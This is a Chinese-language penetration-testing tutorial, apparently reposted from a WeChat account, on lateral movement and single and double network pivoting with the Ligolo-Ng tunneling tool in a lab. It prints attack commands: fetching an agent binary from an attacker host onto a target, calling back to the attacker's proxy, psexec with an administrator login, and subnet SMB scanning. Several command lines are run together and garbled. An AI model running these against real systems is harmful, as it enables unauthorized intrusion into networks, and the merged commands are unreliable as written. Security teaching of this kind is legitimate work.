本指南全面介绍了利用 Nicolas Chatelain 开发的 Ligolo-Ng 工具进行横向移动的复杂性。Ligolo-Ng 工具使用 tun 接口通过反向 TCP/TLS 连接建立隧道,从而避免了 SOCKS 的必要性。本指南涵盖了各个方面,从该工具的独特功能到实际应用,例如网络内的单枢转和双枢转。
下载 Ligolo-Ng:
Ligolo-Ng 可以从官方存储库下载:Ligolo-Ng Releases。
目录:
- Ligolo-Ng简介
- Ligolo V/S 凿子
- 实验室设置
- 先决条件
- 设置 Ligolo-Ng
- 单枢轴
- 双枢轴
Ligolo-Ng 概述:
Ligolo-Ng 是一款轻量级且高效的工具,旨在使渗透测试人员能够使用 tun 接口通过反向 TCP/TLS 连接建立隧道。值得注意的功能包括其 GO 编码特性、类似 VPN 的行为、可自定义的代理和 GO 中的代理。该工具支持多种协议,包括 ICMP、UDP、SYN 隐身扫描、操作系统检测和 DNS 解析,提供高达 100 Mbits/秒的连接速度。Ligolo-Ng 通过避免工具残留在磁盘或内存中来最大限度地减少维护时间。
Ligolo V/S 凿子:
- Ligolo-Ng 在速度和定制选项方面优于 Chisel。
- Chisel 采用服务器-客户端模型运行,而 Ligolo-Ng 则与每个目标建立单独的连接。
- Ligolo-Ng 通过避免工具残留在磁盘或内存中来减少维护时间。
- Ligolo-Ng 支持各种协议,包括 ICMP、UDP、SYN,而 Chisel 主要使用 websocket 在 HTTP 上运行。
实验室设置
按照分步指南进行网络内的横向移动,涵盖单枢轴和双枢轴技术。
先决条件
获取适用于 Windows 64 位的 Ligolo“代理”文件和适用于 Linux 64 位的“代理”文件。
在目标机器上安装“代理”文件,在攻击机器(Kali Linux)上安装“代理”文件。
设置 Ligolo-Ng
步骤 1:获取代理和代理文件后,下一步是设置 Ligolo-Ng。要确定 Ligolo-Ng 配置的当前状态,请使用“ifconfig”命令。要启动激活,请执行以下规定的命令序列:
ip tuntap adduser root mode tun ligoloip link set ligolo up
tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz./proxy -h
./proxy -selfcert
unzip ligolo-ng_agent_0.5.1_windows_amd64.zipupdog -p80
cd Desktoppowershell wget 192.168.1.5/agent.exe -o agent.exedir
./agent.exe -connect 192.168.1.5:11601 -ignore-cert
执行指定命令后,将启动 Ligolo 会话。随后,使用“session”命令,选择“1”以访问活动会话。会话建立后,执行“ifconfig”命令,如提供的图像所示。
值得注意的是,它揭示了服务器上存在内部网络,IPv4 地址为 192.168.148.130/24。这一发现促使我们在后续步骤中进一步探索如何通过该内部网络创建隧道。
单枢轴
在单枢纽场景中,目标是在网络边界内访问网络 B
ip route add192.168.148.0/24 dev ligoloip route list
双枢轴
在双枢转过程中,我们的目标是利用网络 B 作为中介,从网络 A 访问网络 C。
impacket-psexec administrator:[email protected]cd c:userspublicpowershell wget 192.168.1.5/agent.exe -o agent.exedir
agent.exe -connect192.168.1.5:11601 -ignore-cert
ip route add192.168.159.0/24 dev ligoloip route list
listener_add --addr0.0.0.0:1234 --to 127.0.0.1:4444
crackmapexec smb 192.168.159.0/24
原文始发于微信公众号(三沐数安):Ligolo-Ng 详细指南
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论